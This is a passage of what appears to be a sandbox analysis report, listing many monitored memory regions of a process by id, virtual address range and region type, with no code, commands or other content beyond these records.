region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10643 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10644 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10645 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10646 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10647 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10648 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10649 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10650 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10651 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10652 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10653 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10654 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10656 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10657 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10658 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10659 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10673 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10674 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10675 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10676 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10677 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10678 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10679 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10680 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10683 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10684 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10685 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10686 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10687 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10688 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10689 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10690 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10692 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10693 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10694 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10696 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10699 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10700 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10701 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10702 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10703 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10704 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10705 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10706 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10707 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10708 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10709 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10710 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10711 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10712 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10713 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10714 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10715 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10716 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10717 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10718 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10719 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10720 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10721 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10722 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10725 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10727 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10728 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10729 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10730 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10731 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10732 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10733 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10734 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10735 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10736 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10737 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10738 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10739 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10740 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10741 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10742 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10743 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10744 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10745 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10746 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10747 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10748 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10749 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10750 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10751 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10752 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10753 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10754 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10755 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10756 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10757 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10758 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10759 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10760 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10761 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10762 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10763 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10764 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10765 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10766 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10767 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10768 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10769 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10770 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10771 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10772 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10773 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10774 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10775 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10776 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10777 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10778 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10779 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10780 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10781 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10782 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10783 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10784 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10785 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10787 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10788 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10789 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10790 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10791 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10792 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10793 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10794 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10795 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10796 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10797 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10798 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10799 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10800 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10801 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10802 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10803 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10804 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10805 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10806 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10807 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10808 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10809 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10810 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10811 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10812 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10813 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10814 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10815 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10816 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10817 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10818 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10819 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10820 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10821 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10822 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10825 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10826 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10827 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10828 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10829 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10830 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10831 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10832 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10833 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10834 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10835 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10836 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10837 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10838 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10839 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10840 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10841 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10842 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10843 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10844 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10845 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10846 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10847 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10848 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10849 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10850 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10851 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10852 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10853 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10854 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10855 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10856 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10857 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10858 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 